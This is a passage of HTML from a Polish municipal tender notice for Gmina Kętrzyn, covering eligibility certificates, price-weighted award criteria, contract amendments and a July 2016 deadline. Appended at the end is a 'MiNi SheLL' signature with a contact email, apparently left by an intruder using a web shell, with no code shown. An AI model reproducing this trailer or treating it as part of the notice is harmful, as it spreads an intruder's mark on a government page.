<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.99</li>
<li>2 - Częstotliwość zbiórki objazdowej - 0.01</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści  umowy, wymagają aneksu podpisanego przez obie strony umowy, sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności       i mogą być dokonane z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. 
       2. Z zastrzeżeniem ust.1 zamawiający dopuszcza wprowadzenie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,  w następujących zakresach:  
    a) zmiany wynagrodzenia Wykonawcy w przypadku:
      -  zmiany urzędowej stawki podatku od towarów i usług (VAT) - zmiana wynagrodzenia
         o  różnicę w wysokości podatku;
      -  zmiany ceny w RIPOK  (regionalnej instalacji przetwarzania odpadów komunalnych)
         w stosunku do ceny obowiązującej w dniu  zawarcia   umowy -  zmiana
         wynagrodzenia o procentowy wskaźnik zmiany ceny w RIPOK;
     b) prowadzących do poprawy jakości obsługi mieszkańców Gminy Kętrzyn, bez wzrostu                          
         kosztów realizacji zamówienia, 
     c) dotyczących zmiany sposobu realizacji zamówienia, wynikającego ze zmiany przepisów
         prawa ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gminaketrzyn.pl/zamowienia_publiczne/110/status/rodzaj/wzp/zwr/#<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com